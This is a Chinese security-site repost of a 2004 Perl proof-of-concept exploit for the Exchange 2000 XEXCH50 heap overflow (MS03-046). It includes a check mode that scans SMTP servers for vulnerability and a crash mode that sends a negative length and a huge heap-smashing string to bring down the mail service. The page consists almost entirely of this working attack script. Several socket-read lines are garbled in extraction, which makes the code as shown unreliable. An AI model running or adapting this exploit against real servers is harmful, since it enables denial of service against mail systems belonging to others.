您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

Exchange 2000 XEXCH50 Heap Overflow PoC 利用代码

2004-9-29 20:05| 投稿: security

摘要: #!/usr/bin/perl -w##################### ms03-046.pl - hdm metasploit com# This vulnerability allows ...
#!/usr/bin/perl -w##################### ms03-046.pl - hdm metasploit com# This vulnerability allows a remote unauthenticated user to overwrite big chunks # of the heap used by the inetinfo.exe process. Reliably exploiting this bug is # non-trivial; even though the entire buffer is binary safe (even nulls) and can be # just about any size, the actual code that crashes varies widely with each request. # During the analysis process, numerous combinations of request size, concurrent # requests, pre-allocations, and alternate trigger routes were examined and not a # single duplicate of location and data offset was discovered. Hopefully the magic # combination of data, size, and setup will be found to allow this bug to be reliably # exploited.# minor bugfix: look for 354 Send binary datause strict;use IO::Socket;my $host = shift() || usage();my $mode = shift() || "CHECK";my $port = 25;if (uc($mode) eq "CHECK") { check() }if (uc($mode) eq "CRASH") { crash() }usage();sub check{    my $s = SMTP($host, $port);    if (! $s)    {        print "[*] Error establishing connection to SMTP service.\n";        exit(0);    }    print $s "XEXCH50 2 2\r\n";    my $res = ;        close ($s);    # a patched server only allows XEXCH50 after NTLM authentication    if ($res !~ /354 Send binary/i)    {        print "[*] This server has been patched or is not vulnerable.\n";        exit(0);    }    print "[*] This system is vulnerable: $host:$port\n";    exit(0);}sub crash{    my $s = SMTP($host, $port);    if (! $s)    {        print "[*] Error establishing connection to SMTP service.\n";        exit(0);    }    # the negative value allows us to overwrite random heap bits    print $s "XEXCH50 -1 2\r\n";    my $res = ;        # a patched server only allows XEXCH50 after NTLM authentication    if ($res !~ /354 Send binary/i)    {        print "[*] This server has been patched or is not vulnerable.\n";        exit(0);    }    print "[*] Sending massive heap-smashing string...\n";    print $s ("META" x 16384);    # sometimes a second connection is required to trigger the crash    $s = SMTP($host, $port);    exit(0);}sub usage {    print STDERR "Usage: $0 [CHECK|CRASH]\n";    exit(0);}sub SMTP{    my ($host, $port) = @_;    my $s = IO::Socket::INET->new    (        PeerAddr => $host,        PeerPort => $port,        Proto    => "tcp"    ) || return(undef);    my $r = ;    return undef if !$r;        if ($r !~ /Microsoft/)    {        chomp($r);        print STDERR "[*] This does not look like an exchange server: $r\n";        return(undef);    }        print $s "HELO X\r\n";    $r = ;    return undef if !$r;      print $s "MAIL FROM: DoS\r\n";    $r = ;    return undef if !$r;        print $s "RCPT TO: Administrator\r\n";    $r = ;    return undef if !$r;        return($s); }

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部